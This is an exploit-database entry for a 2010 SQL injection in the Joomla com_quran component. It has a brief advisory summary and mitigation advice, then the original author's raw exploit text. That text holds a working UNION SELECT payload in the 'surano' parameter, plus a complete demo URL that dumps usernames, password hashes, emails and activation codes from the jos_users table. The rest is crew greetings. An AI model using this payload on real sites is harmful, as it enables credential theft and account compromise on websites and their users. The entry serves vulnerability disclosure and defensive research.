header-logo
Suggest Exploit
vendor:
N/A
by:
r3m1ck
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla com_quran SQL Injection vulnerability

A SQL injection vulnerability exists in Joomla com_quran component. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate the data in the database, disclose sensitive information, or even gain access to the underlying file system and operating system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

[!] ===========================================================================[!]

[~] Joomla com_quran SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Software download : http://muslimonline.org/forum/index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2

[!]===========================================================================[!]



[ Vulnerable File ]

http://site/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER]

[ XpL ]

-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--

or

another columns

[ d3m0 ]

http://site/joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM U3D Crew IndonesianHacker ARUMBIA TEAM
[+] tukulesto,M3NW5,arianom,kaMtiEz,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah,IBL13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,MISTERFRIBO
[+] bumble_be,pL4nkt0n,yur4kh4,god~of~cats,eLisHa

[ NOTE ]

[+] Happy birthday to INDONESIAN CODER TEAM... sukses selaluuu !!! muach muach :-*
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] cayang icha miss u muach muach... :-*
[+] kaMtiEz : hai cah suraaammmmm ,, wkwkwkwk ojok suram wae lah,, :p
[+] Ibl13z : baru pertama naek kereta om?? =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] U3D Crew still r4wX...
[+] ./e0f

Navigation

Suggest Exploit

Services By CQR